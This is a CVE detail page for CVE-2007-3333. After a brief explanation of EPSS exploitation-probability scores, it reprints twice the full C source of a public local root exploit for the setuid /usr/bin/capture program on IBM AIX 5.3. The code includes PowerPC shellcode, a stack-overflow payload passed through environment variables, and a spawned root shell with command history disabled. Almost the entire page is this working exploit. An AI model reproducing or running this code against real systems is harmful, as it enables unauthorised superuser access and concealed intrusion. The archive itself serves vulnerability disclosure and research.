CVE-2007-3333 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/25075/info IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser. Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions. /* 07/2007: public release * * qaaz@aix:~$ ./aix-capture * -------------------------------- * AIX capture Local Root Exploit * By qaaz * -------------------------------- * bash: no job control in this shell * bash-3.00# */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/wait.h> #include <sys/select.h> #define TARGET "/usr/bin/capture" #define VALCNT 40 #define MAX(x,y) ((x) > (y) ? (x) : (y)) #define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y)) unsigned char qaazcode[] = "\x60\x60\x60\x60\x60\x60\x60\x60" "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x44\xff\xff\x02\x38\x75\xff\x5f" "\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x02\x38\x63\xfe\xff" "\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; void shell(int p1[2], int p2[2]) { ssize_t n; fd_set rset; char buf[4096]; for (;;) { FD_ZERO(&rset); FD_SET(p1[0], &rset); FD_SET(p2[0], &rset); n = select(MAX(p1[0], p2[0]) + 1, &rset, NULL, NULL, NULL); if (n < 0) { perror("[-] select"); break; } if (FD_ISSET(p1[0], &rset)) { n = read(p1[0], buf, sizeof(buf)); if (n <= 0) break; write(p1[1], buf, n); } if (FD_ISSET(p2[0], &rset)) { n = read(p2[0], buf, sizeof(buf)); if (n <= 0) break; write(p2[1], buf, n); } } } /* just because you don't understand it doesn't mean it has to be wrong */ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) { ulong top, len, off; int i; len = 0; for (i = 0; argv[i]; i++) len += strlen(argv[i]) + 1; for (i = 0; envp[i]; i++) len += strlen(envp[i]) + 1; top = (ulong) argv[0] + ALIGN(len, 8); len = off = 0; for (i = 0; args[i]; i++) len += strlen(args[i]) + 1; for (i = 0; envs[i]; i++) { if (!strncmp(envs[i], "EGG=", 4)) off = len + 4; len += strlen(envs[i]) + 1; } while (off & 3) strcat(envs[0], "X"), off++, len++; return top - ALIGN(len, 4) + off; } int main(int argc, char *argv[], char *envp[]) { char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; char *args[] = { TARGET, "/dev/null", NULL }; char *envs[] = { pad, bsh, egg, NULL }; int ptm, pts, pi[2]; pid_t child; sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); if (!envp[0]) { dup2(3, 0); setuid(geteuid()); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL); perror("[-] execl"); exit(1); } else if (argc && !strcmp(argv[0], "bsh")) { char i, ch; ulong addr = get_addr(argv, envp, args, envs); printf("\x1b["); for (i = 0; i < VALCNT; i++) printf("%lu;", addr); printf("0A\n"); fflush(stdout); while (read(0, &ch, 1) == 1) write(1, &ch, 1); exit(0); } printf("--------------------------------\n"); printf(" AIX capture Local Root Exploit\n"); printf(" By qaaz\n"); printf("--------------------------------\n"); if (pipe(pi) < 0) { perror("[-] pipe"); exit(1); } if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || (pts = open(ttyname(ptm), O_RDWR)) < 0) { perror("[-] pty"); exit(1); } if ((child = fork()) < 0) { perror("[-] fork"); exit(1); } if (child == 0) { dup2(pts, 0); dup2(pts, 1); dup2(pts, 2); dup2(pi[0], 3); execve(TARGET, args, envs); perror("[-] execve"); exit(1); } close(pi[0]); close(pts); sleep(1); read(ptm, buf, sizeof(buf)); write(ptm, " ", 1); shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); kill(child, SIGTERM); waitpid(child, NULL, 0); return 0; }

/* 07/2007: public release * IBM AIX <= 5.3 sp6 * * AIX capture Local Root Exploit * By qaaz */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/wait.h> #include <sys/select.h> #define TARGET "/usr/bin/capture" #define VALCNT 40 #define MAX(x,y) ((x) > (y) ? (x) : (y)) #define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) unsigned char qaazcode[] = "\x60\x60\x60\x60\x60\x60\x60\x60" "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x44\xff\xff\x02\x38\x75\xff\x5f" "\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x02\x38\x63\xfe\xff" "\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; void shell(int p1[2], int p2[2]) { ssize_t n; fd_set rset; char buf[4096]; for (;;) { FD_ZERO(&rset); FD_SET(p1[0], &rset); FD_SET(p2[0], &rset); n = select(MAX(p1[0], p2[0]) + 1, &rset, NULL, NULL, NULL); if (n < 0) { perror("[-] select"); break; } if (FD_ISSET(p1[0], &rset)) { n = read(p1[0], buf, sizeof(buf)); if (n <= 0) break; write(p1[1], buf, n); } if (FD_ISSET(p2[0], &rset)) { n = read(p2[0], buf, sizeof(buf)); if (n <= 0) break; write(p2[1], buf, n); } } } /* just because you don't understand it doesn't mean it has to be wrong */ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) { ulong top, len, off; int i; len = 0; for (i = 0; argv[i]; i++) len += strlen(argv[i]) + 1; for (i = 0; envp[i]; i++) len += strlen(envp[i]) + 1; top = (ulong) argv[0] + ALIGN(len, 8); len = off = 0; for (i = 0; args[i]; i++) len += strlen(args[i]) + 1; for (i = 0; envs[i]; i++) { if (!strncmp(envs[i], "EGG=", 4)) off = len + 4; len += strlen(envs[i]) + 1; } while (off & 3) strcat(envs[0], "X"), off++, len++; return top - ALIGN(len, 4) + off; } int main(int argc, char *argv[], char *envp[]) { char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; char *args[] = { TARGET, "/dev/null", NULL }; char *envs[] = { pad, bsh, egg, NULL }; int ptm, pts, pi[2]; pid_t child; ulong addr; sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); addr = get_addr(argv, envp, args, envs); if (!envp[0]) { dup2(3, 0); setuid(geteuid()); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL); perror("[-] execl"); exit(1); } else if (argc && !strcmp(argv[0], "bsh")) { char i, ch; printf("\x1b["); for (i = 0; i < VALCNT; i++) printf("%lu;", addr); printf("0A\n"); fflush(stdout); while (read(0, &ch, 1) == 1) write(1, &ch, 1); exit(0); } printf("--------------------------------\n"); printf(" AIX capture Local Root Exploit\n"); printf(" By qaaz\n"); printf("--------------------------------\n"); if (pipe(pi) < 0) { perror("[-] pipe"); exit(1); } if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || (pts = open(ttyname(ptm), O_RDWR)) < 0) { perror("[-] pty"); exit(1); } if ((child = fork()) < 0) { perror("[-] fork"); exit(1); } if (child == 0) { dup2(pts, 0); dup2(pts, 1); dup2(pts, 2); dup2(pi[0], 3); execve(TARGET, args, envs); perror("[-] execve"); exit(1); } close(pi[0]); close(pts); sleep(1); read(ptm, buf, sizeof(buf)); write(ptm, " ", 1); shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); kill(child, SIGTERM); waitpid(child, NULL, 0); return 0; } // milw0rm.com [2007-07-27]